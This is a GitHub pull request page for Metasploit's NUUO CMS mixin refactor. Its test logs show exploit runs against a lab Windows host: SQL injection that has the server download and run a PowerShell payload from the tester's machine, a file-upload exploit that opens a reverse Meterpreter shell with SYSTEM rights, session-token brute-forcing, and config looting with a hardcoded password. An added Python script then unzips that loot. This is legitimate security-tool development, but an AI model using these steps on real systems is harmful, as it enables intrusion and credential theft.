
Update NUUO mixin, move code to Rex #11765

Merged: 16 commits merged into rapid7:master from jrobles-r7:ncs-rex on Apr 25, 2019

Conversation

@jrobles-r7 (Contributor) commented Apr 22, 2019

Generalized the NUUO mixin code and moved the implementation to Rex. One of the nuuo modules has been updated to work with the new code.

Note: This does break the nuuo modules that have not been updated. I'm working on fixes for those as well.
All the modules have been updated.

Verification

  • rspec spec/lib/rex/proto/nuuo/
  • Verify all green
  • ./msfconsole -q
  • use auxiliary/gather/nuuo_cms_file_download
  • set rhosts <rhost>
  • set NCSBRUTEAPI true
  • run
  • Module runs successfully; config files are downloaded.
jrobles-r7 added 8 commits Feb 15, 2019
  • Parse server responses
  • aux:nuuo_cms_file_download
jrobles-r7 added 7 commits Apr 22, 2019
  • Use the updated mixin/rex implementation
  • Use updated nuuo mixin/rex
  • Module was updated to use the changes in the nuuo mixin
@jrobles-r7 (Contributor, Author) commented Apr 24, 2019

Tested on Windows 10 running NCS Server v2.4.0

msf5 > use exploit/windows/nuuo/nuuo_cms_sqli
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://0.0.0.0:8080/EqtOgSEOY
[*] Local IP: http://192.168.171.150:8080/EqtOgSEOY
[*] Server started.
[*] Enabling xp_cmdshell and asking CMS to download and execute http://172.22.222.136:8080/EqtOgSEOY
[*] Injecting PowerShell payload
[+] Sending the payload to CMS...
[*] Executing shell...
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:49681) at 2019-04-24 06:58:12 -0500
[+] Deleted c:/windows/temp/jzyjzncewx.ps1
[*] Server stopped.

meterpreter > getuid
Server username: NT Service\MSSQLSERVER
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > 
msf5 > use exploit/windows/nuuo/nuuo_cms_fu
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Backing up LicenseTool.dll to NoaomDOkOZyn
[*] Uploading payload...
[*] Sleeping 15 seconds...
[*] Sending SENDLICFILE request, shell incoming!
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:49682) at 2019-04-24 06:59:25 -0500

meterpreter > 
[!] Please wait a bit while we clean up
[+] Successfully restored LicenseTool.dll!
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
[+] We should have SYSTEM now, enjoy your shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_fu) >
msf5 > use auxiliary/gather/nuuo_cms_file_download
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > set ncsbruteapi true
ncsbruteapi => true
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[*] Running module against 172.22.222.200

[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_CMServer.cfg_439756.cfg
[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_ServerConfig.cfg_025736.cfg
[*] 

    The user and server configuration files were stored in the loot database.
    The files are ZIP encrypted, and due to the lack of the archive/zip gem,
    they cannot be decrypted in Metasploit.
    You will need to open them up with zip or a similar utility, and use the
    password NUCMS2007! to unzip them.
    Annoy the Metasploit developers until this gets fixed!
    
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >

Tested on Windows 10 running NCS Server v2.1.0

msf5 > use auxiliary/gather/nuuo_cms_bruteforce
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] Running module against 172.22.222.200

[*] Bruteforcing session - this might take a while, go get some coffee!
[*] Generating 2621440 session tokens
[+] Found valid user session: 42204032
[*] Time taken: 1414.4688972589793 seconds; total tries 616910
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) > 
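The file-download output above says the two configs land in the loot directory as ZIP archives that Metasploit cannot open, and that they unzip with the password NUCMS2007!. The following is an added example for this page, not code from the PR, Metasploit or Rex: it batch-extracts those loot files for one host, using Python's stdlib zipfile (which can read traditional PKWARE-encrypted entries) and refusing archive members that would escape the output directory, since the archive was produced by a target you do not trust. Assumptions, labelled in the code: the loot filename layout is the one visible in the output (`<YYYYmmddHHMMSS>_<workspace>_<host>_<type>_<random>.<ext>`, with no underscore in the workspace or host), and the `demo()` fixtures are constructed stand-ins, not real configs.

```python
"""Batch-extract the ZIP-encrypted config files that
auxiliary/gather/nuuo_cms_file_download stores under ~/.msf4/loot.

Added example, not code from Metasploit, Rex or the PR author. Assumes the
loot filename layout seen in the PR's test output and the static password
the module prints (NUCMS2007!).
"""
import re
import tempfile
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional

# Password reported by the module. zipfile can read (not write) entries
# protected with traditional PKWARE encryption.
NUUO_CFG_PASSWORD = b"NUCMS2007!"

# Loot types the module produced in the PR's test run.
NUUO_CFG_TYPES = ("CMServer.cfg", "ServerConfig.cfg")

# Assumed layout: <ts>_<workspace>_<host>_<type>_<random>.<ext>, with no
# underscore inside workspace or host (true for the filenames on the page).
LOOT_RE = re.compile(
    r"^(?P<ts>\d{14})_(?P<workspace>[^_]+)_(?P<host>[^_]+)_"
    r"(?P<ltype>.+)_(?P<rand>\d+)\.(?P<ext>[^.]+)$"
)


@dataclass(frozen=True)
class LootName:
    timestamp: str
    workspace: str
    host: str
    ltype: str
    ext: str


def parse_loot_name(filename: str) -> Optional[LootName]:
    """Split a loot filename into its fields; None if it does not fit."""
    m = LOOT_RE.match(filename)
    if not m:
        return None
    return LootName(m["ts"], m["workspace"], m["host"], m["ltype"], m["ext"])


def extract_nuuo_config(zip_path: Path, dest_dir: Path,
                        password: bytes = NUUO_CFG_PASSWORD) -> List[str]:
    """Extract one downloaded .cfg (really a ZIP) into dest_dir.

    Raises ValueError for non-ZIP input or a member that would escape
    dest_dir; zipfile raises RuntimeError itself on a wrong password.
    """
    if not zipfile.is_zipfile(zip_path):
        raise ValueError(f"{zip_path.name}: not a ZIP archive")
    with zipfile.ZipFile(zip_path) as zf:
        # Untrusted archive: check every member for traversal before any
        # byte is written to disk.
        for info in zf.infolist():
            member = Path(info.filename)
            if member.is_absolute() or ".." in member.parts:
                raise ValueError(f"{zip_path.name}: unsafe member {info.filename!r}")
        zf.extractall(dest_dir, pwd=password)
        return [info.filename for info in zf.infolist()]


def extract_loot_dir(loot_dir: Path, host: str, dest_root: Path) -> Dict[str, dict]:
    """Extract every CMServer.cfg / ServerConfig.cfg loot file for one host.

    Returns {loot filename: {"members": [...]}} on success or
    {loot filename: {"error": "..."}} when an archive is refused, so one bad
    file does not abort the batch.
    """
    results: Dict[str, dict] = {}
    for path in sorted(loot_dir.glob("*.cfg")):
        meta = parse_loot_name(path.name)
        if meta is None or meta.host != host or meta.ltype not in NUUO_CFG_TYPES:
            continue
        dest = dest_root / f"{meta.timestamp}_{meta.ltype}"
        dest.mkdir(parents=True, exist_ok=True)
        try:
            results[path.name] = {"members": extract_nuuo_config(path, dest)}
        except (ValueError, RuntimeError, zipfile.BadZipFile) as exc:
            results[path.name] = {"error": str(exc)}
    return results


def demo() -> Dict[str, dict]:
    """Run the batch on constructed fixtures (not real loot): an unencrypted
    stand-in named like the module's output, plus a hostile archive with a
    '../' member. zipfile accepts pwd for unencrypted entries, so the code
    path is the same as for the real password-protected files."""
    with tempfile.TemporaryDirectory() as tmp:
        loot = Path(tmp) / "loot"
        loot.mkdir()
        good = loot / "20190424065707_default_172.22.222.200_CMServer.cfg_439756.cfg"
        with zipfile.ZipFile(good, "w") as zf:
            zf.writestr("CMServer.cfg", "<!-- constructed sample, not a real config -->")
        bad = loot / "20190424065708_default_172.22.222.200_ServerConfig.cfg_111111.cfg"
        with zipfile.ZipFile(bad, "w") as zf:
            zf.writestr("../escape.txt", "constructed traversal member")
        return extract_loot_dir(loot, "172.22.222.200", Path(tmp) / "out")


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Against a real loot directory, call `extract_loot_dir(Path.home() / ".msf4/loot", "172.22.222.200", Path("nuuo_out"))`; a wrong password surfaces as an `error` entry carrying zipfile's "Bad password" message rather than a half-written output tree.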
jrobles-r7 marked this pull request as ready for review Apr 24, 2019
lib/msf/core/exploit/nuuo.rb: review thread (outdated, resolved)
lib/rex/proto/nuuo/client.rb: review thread (outdated, resolved)
Only TCP is supported for the mixin.
jrobles-r7 self-assigned this Apr 25, 2019
jrobles-r7 merged commit f3a820b into rapid7:master Apr 25, 2019
3 checks passed:
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed
jrobles-r7 added a commit that referenced this pull request Apr 25, 2019
jrobles-r7 deleted the jrobles-r7:ncs-rex branch Apr 25, 2019
msjenkins-r7 added a commit that referenced this pull request Apr 25, 2019
@jrobles-r7 (Contributor, Author) commented Apr 25, 2019

Release Notes

This update generalizes the Nuuo mixin and adds code to Rex for handling NCS requests/responses.

4 participants